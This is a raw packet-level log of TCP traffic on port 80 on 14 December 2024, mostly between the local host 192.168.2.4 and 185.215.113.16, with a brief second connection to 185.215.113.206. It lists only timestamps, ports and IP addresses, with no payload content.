Dec 14, 2024 12:56:33.089082003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.089131117 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.090152025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.090214968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.090290070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.090347052 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.091341972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.091402054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.091444969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.091500998 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.092516899 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.092570066 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.092643976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.092699051 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.093772888 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.093827963 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.093832016 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.093883038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.094876051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.094935894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.095009089 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.095066071 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.096034050 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.096096992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.096164942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.096221924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.097214937 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.097268105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.097341061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.097394943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.098437071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.098499060 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.098571062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.098625898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.099571943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.099647045 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.099703074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.099757910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.100779057 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.100831985 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.100876093 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.100939035 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.101927042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.101980925 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.102068901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.102117062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.103362083 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.103420973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.103498936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.103552103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.104265928 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.104336023 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.104417086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.104465961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.105468988 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.105535030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.105586052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.105643034 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.106642008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.106698036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.106784105 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.106832981 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.107839108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.107901096 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.107954025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.108007908 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.108979940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.109039068 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.109103918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.109158993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.110172033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.110228062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.110358000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.110411882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.111367941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.111430883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.111494064 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.111548901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.112546921 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.112601042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.112605095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.112653017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.113699913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.113759041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.113831043 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.113887072 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.114866018 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.114923954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.114996910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.115051985 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.116049051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.116102934 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.116112947 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.116149902 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.247500896 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.247543097 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.247689962 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.247694969 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.247694969 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.247749090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.247775078 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.247811079 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.248857975 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.248951912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.248992920 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.249051094 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.250001907 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.250057936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.250060081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.250108957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.251202106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.251260996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.251377106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.251430035 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.252384901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.252439976 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.252496958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.252554893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.253520966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.253573895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.253645897 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.253695011 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.254764080 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.254825115 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.254905939 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.254956961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.255898952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.255956888 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.256012917 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.256062031 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.257136106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.257193089 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.257349968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.257404089 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.258819103 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.258857012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.258897066 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.258898020 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.259598970 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.259660006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.259732962 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.259793043 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.260641098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.260683060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.260716915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.260751963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.261769056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.261823893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.261893988 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.261943102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.262979984 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.263036966 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.263113022 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.263160944 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.264154911 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.264205933 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.264286995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.264334917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.265386105 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.265435934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.265455008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.265503883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.266500950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.266556025 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.266594887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.266647100 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.267687082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.267741919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.267808914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.267859936 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.268862009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.268918037 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.269021034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.269069910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.270076036 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.270167112 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.270173073 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.270215988 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.271189928 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.271250963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.271303892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.271363974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.272404909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.272454977 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.272507906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.272558928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.273551941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.273606062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.273679972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.273729086 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.274738073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.274801970 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.274861097 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.274912119 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.275975943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.276031017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.276036978 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.276077032 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.277218103 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.277280092 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.277297020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.277343988 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.278402090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.278465986 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.278469086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.278517962 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.279460907 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.279522896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.279598951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.279649973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.280612946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.280683041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.280770063 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.280819893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.281888008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.281941891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.282013893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.282067060 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.283030987 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.283090115 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.283117056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.283165932 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.284215927 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.284280062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.284290075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.284339905 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.285370111 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.285433054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.285512924 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.285581112 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.286572933 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.286607981 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.286627054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.286658049 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.287672997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.287733078 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.287791014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.287847042 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.288938999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.288994074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.289068937 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.289119005 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.290200949 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.290270090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.290376902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.290436983 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.291208982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.291305065 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.291337013 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.291397095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.292387009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.292439938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.292439938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.292485952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.293581963 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.293643951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.293725967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.293778896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.294737101 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.294850111 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.294864893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.294918060 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.295947075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.296005964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.296065092 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.296116114 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.297090054 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.297142982 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.297200918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.297252893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.298444986 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.298518896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.298584938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.298639059 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.299521923 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.299588919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.299679041 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.299734116 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.300714970 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.300769091 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.300816059 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.300868034 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.301815033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.301870108 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.301956892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.302006006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.303203106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.303277016 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.303359032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.303416014 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.304477930 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.304537058 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.304619074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.304668903 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.305712938 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.305764914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.305771112 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.305814028 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.306700945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.306751966 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.306797981 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.306848049 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.307743073 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.307795048 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.307852030 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.307900906 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.308902025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.308967113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.422545910 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:33.422758102 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:33.423751116 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:33.439933062 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.440018892 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.440068960 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.440264940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.440282106 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.440423012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.440479040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.441503048 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.441611052 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.441617012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.441667080 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.442635059 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.442697048 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.442764997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.442821980 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.443813086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.443878889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.443933010 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.444006920 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.444998980 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.445061922 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.445152044 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.445209980 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.446182966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.446238041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.446317911 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.446377039 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.447395086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.447453976 CET	49827	80	192.168.2.4	185.215.113.16
